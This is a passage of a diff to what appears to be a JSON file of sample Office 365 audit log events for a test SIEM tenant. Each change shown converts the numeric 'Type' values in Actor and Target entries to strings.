"18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -12529,19 +12529,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12627,27 +12627,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12723,19 +12723,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -12821,27 +12821,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -12917,19 +12917,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13015,27 +13015,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13111,19 +13111,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13209,27 +13209,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -13299,23 +13299,23 @@ "Target": [ { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13404,27 +13404,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13509,27 +13509,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13615,27 +13615,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -13720,27 +13720,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13826,27 +13826,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -13931,27 +13931,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -14037,27 +14037,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14142,27 +14142,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14248,27 +14248,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14322,19 +14322,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -14420,27 +14420,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14504,19 +14504,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14602,27 +14602,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14686,19 +14686,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -14784,27 +14784,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14869,27 +14869,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -14975,27 +14975,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -15060,27 +15060,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15166,27 +15166,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15251,27 +15251,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -15357,27 +15357,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15441,19 +15441,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15539,27 +15539,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15623,19 +15623,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -15721,27 +15721,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15805,19 +15805,19 @@ "Target": [ { "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15903,27 +15903,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -15988,27 +15988,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -16094,27 +16094,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -16179,27 +16179,27 @@ "Target": [ { "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem2", - "Type": 1 + "Type": "1" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 2 + "Type": "2" }, { "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -16285,27 +16285,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -16370,27 +16370,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "siem2",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -16476,27 +16476,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -16574,27 +16574,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "Office 365 Management APIs",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -16680,27 +16680,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -16778,27 +16778,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "Office 365 Management APIs",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
- "Type": 4
+ "Type": "4"
 }
 ],
 "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -16884,27 +16884,27 @@
 "Actor": [
 {
 "ID": "asr@testsiem.onmicrosoft.com",
- "Type": 5
+ "Type": "5"
 },
 {
 "ID": "1003200096971F55",
- "Type": 3
+ "Type": "3"
 },
 {
 "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "755e500a-6c03-46b0-b53b-282f23374e3b",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "User",
- "Type": 2
+ "Type": "2"
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -16982,27 +16982,27 @@
 "Target": [
 {
 "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "ServicePrincipal",
- "Type": 2
+ "Type": "2"
 },
 {
 "ID": "Office 365 Management APIs",
- "Type": 1
+ "Type": "1"
 },
 {
 "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2",
- "Type": 2
+ "Type": "2"
 },
 {
